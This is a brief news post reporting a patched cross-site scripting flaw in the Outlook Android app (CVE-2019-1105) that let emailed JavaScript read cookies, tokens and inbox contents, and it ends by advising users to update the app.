Remote Code Execution bug on Microsoft Outlook App - POC Released

If you use Microsoft Outlook Android app for your emails, then here is very important things for you all. Recently Microsoft have patched a critical Remote Code Execution bug on its Outlook android app.

This critical RCE bug which is identified as CVE-2019-1105 has been discovered by security researcher Bryan Appleby of F5 Networks, which he had reported to Microsoft security team on December 2018. On the blog-post, Bryan have disclosed all the technical details of the bug with the Proof-of-Concepts.

In the blog, Bryan said he accidentally discovered the cross site scripting (XSS) issue that could allow an attacker to embed an iframe into the email. After getting deep into the issue, he found that executing JavaScript code inside the injected iframe can allow the attacker to read app-related content in the context of logged-in Outlook user, including their cookies, tokens and even some contents of their email inbox.

This kind of vulnerability could be exploited by an attacker sending an email with JavaScript in it. The server escapes that JavaScript and does not see it because it’s within an iframe. When delivered, the mail client automatically undoes the escaping and the JavaScript runs on the client device. Bingo – remote code execution.
This code can do whatever the attacker desires, up to and including stealing information and/or sending data back out. An attacker can send you an email and just by you reading it, they could steal the contents of your inbox. Weaponized, this can turn into a very nasty piece of malware - further he added.

 This bug allow him to steal data from the app including their cookies, tokens and even some contents of their email inbox.

So as you can find that this is very serious issue, so we recommend all  users to immediately update your Outlook app from playstore.

Related Posts

Post a Comment

Subscribe Our Newsletter